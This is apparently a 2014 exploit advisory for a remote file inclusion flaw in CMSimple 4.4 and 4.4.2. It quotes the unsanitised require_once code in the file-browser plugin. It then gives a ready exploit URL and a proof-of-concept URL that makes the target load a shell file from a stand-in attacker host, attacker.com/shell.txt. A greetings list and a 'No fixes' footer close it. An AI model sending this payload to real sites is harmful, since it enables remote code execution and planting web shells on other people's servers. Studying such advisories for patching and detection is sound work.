CMSimple 4.4, 4.4.2 - Remote File Inclusion

2014-04-18 19:05:03

=============================================================================================================


[o] CMSimple - Open Source CMS with no database <= Remote File Inclusion Vulnerability

Software : CMSimple - Open Source CMS with no database
Version : 4.4, 4.4.2 and below
Vendor : http://www.cmsimple.org
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com
Desc : CMSimple is a php based Content Managemant System (CMS), which requires no database.
All data are stored in a simple file system.


=============================================================================================================


[o] Vulnerable File

plugins/filebrowser/classes/required_classes.php

require_once $pth['folder']['plugin'] . 'classes/filebrowser_view.php';
require_once $pth['folder']['plugin'] . 'classes/filebrowser.php';


=============================================================================================================


[o] Exploit

http://localhost/[path]/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=[RFI]


=============================================================================================================


[o] PoC

http://target.com/[path]/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=http://attacker.com/shell.txt?


=============================================================================================================


[o] Greetz

Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
aJe kaka11 matthews wishnusakti inc0mp13te martfella
pizzyroot Genex H312Y noname tukulesto }^-^{


=============================================================================================================


[o] April 17 2014 - Papua, Indonesia - Met Paskah! Tuhan berkati.. :)

Fixes

No fixes

In order to submit a new fix you need to be registered.